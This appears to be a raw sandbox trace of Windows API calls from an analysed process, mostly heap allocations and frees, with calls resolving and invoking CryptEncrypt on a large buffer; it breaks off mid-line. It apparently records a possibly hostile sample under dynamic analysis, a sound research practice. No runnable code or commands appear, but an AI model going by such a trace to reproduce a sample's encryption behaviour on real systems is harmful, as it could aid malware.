[0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0184.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0184.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0184.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0184.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.521] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0184.521] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x106d5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x106d8) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0184.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0184.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.524] CharLowerBuffW (in: lpsz="byte[67288]", cchLength=0xb | out: lpsz="byte[67288]") returned 0xb [0184.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0184.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.602] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.602] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0184.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0184.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d5) returned 0x3c00e08 [0184.607] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0184.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ad0 [0184.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0184.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.608] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0184.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54418 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0184.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0184.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: 